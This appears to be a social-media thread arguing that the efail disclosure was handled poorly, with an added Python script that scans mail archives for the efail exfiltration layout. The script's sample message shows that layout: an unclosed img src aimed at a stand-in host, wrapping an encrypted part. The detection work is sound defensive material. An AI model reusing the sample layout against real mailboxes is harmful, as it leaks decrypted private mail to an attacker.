Most of us archive our entire history of email. The efail team could have released scripts that review your mailbox for signs of exploitation. Don't you think an img tag wrapping the multipart header would stick out a bit? Even the CFB/CBC gadget is discoverable after decrypting.
I also don't see any attempt to coordinate with major MTAs (e.g., Google or Microsoft). MTAs could have set up detections for direct exploitation and, likely, reviewed everyone's mailboxes for already delivered mail. pic.twitter.com/26SojYl2xb
Don't confuse my distaste for the disclosure with advocacy for S/MIME, PGP, or encrypted email. You should: 1) use authenticated cryptography ffs! 2) stop using email and start using Signal if you need privacy
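The mailbox review suggested at the top of this thread can be sketched as follows. This is an added example, not code from the thread's author or the efail team: it flags a `text/html` part that ends inside an unclosed URL attribute when the next sibling MIME part is ciphertext. The function names, the attribute list and the sample message are assumptions made for illustration, and the check is a heuristic for the direct-exfiltration layout only, not the CBC/CFB gadget case.

```python
import re
from email import message_from_string

# Content types that carry S/MIME or OpenPGP ciphertext.
ENCRYPTED_TYPES = {"application/pkcs7-mime", "application/x-pkcs7-mime",
                   "multipart/encrypted", "application/pgp-encrypted"}
# A URL attribute whose quote opens but never closes before the part ends.
OPEN_URL_ATTR = re.compile(
    r"<\w+[^>]*\b(?:src|href|background|action)\s*=\s*([\"'])(?:(?!\1).)*\Z", re.I | re.S)

def part_text(part):
    raw = part.get_payload(decode=True)  # None for multipart containers
    return "" if raw is None else raw.decode(part.get_content_charset() or "utf-8", "replace")

def is_encrypted(part):
    return (part.get_content_type() in ENCRYPTED_TYPES
            or "-----BEGIN PGP MESSAGE-----" in part_text(part))

def find_wrapped_ciphertext(raw_message):
    """Return (html_index, encrypted_index) pairs of adjacent sibling parts."""
    hits = []
    for container in message_from_string(raw_message).walk():
        parts = container.get_payload() if container.is_multipart() else []
        for i, part in enumerate(parts[:-1]):
            if (part.get_content_type() == "text/html"
                    and OPEN_URL_ATTR.search(part_text(part))
                    and is_encrypted(parts[i + 1])):
                hits.append((i, i + 1))
    return hits

# Constructed sample, not a captured message.
SAMPLE_WRAPPED = """\
Content-Type: multipart/mixed; boundary="B"

--B
Content-Type: text/html

<img src="http://example.invalid/
--B
Content-Type: application/pkcs7-mime; smime-type=enveloped-data

CONSTRUCTED-CIPHERTEXT-PLACEHOLDER
--B
Content-Type: text/html

">
--B--
"""
SAMPLE_BENIGN = SAMPLE_WRAPPED.replace('invalid/\n', 'invalid/logo.png">\n')
```

To review an archive, feed each stored message's raw text to `find_wrapped_ciphertext`, for example by iterating a local `mailbox.mbox`, and triage any non-empty result by hand.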
Can I borrow "intellectually neat, operationally stupid"?
Ransomware is obvious after you’ve been hit too but that doesn’t make it not a serious threat.
It’s not only about man-in-the-middle attacks to catch-modify-release mails. If a three-letter-agency gets access to your mailbox (which is what they do), they can easily hide their traces after they presented you a modified email.
And that one mail can contain thousands of encrypted messages in multiple mime parts prepared to be exfiltrated. Plus something irrelevant on top
Doesn't that depend on the value of the information? A financial attacker wouldn't care. But a nation state targeting Snowden... (luckily I don't consider myself that interesting ;-)
of course, threat models always matter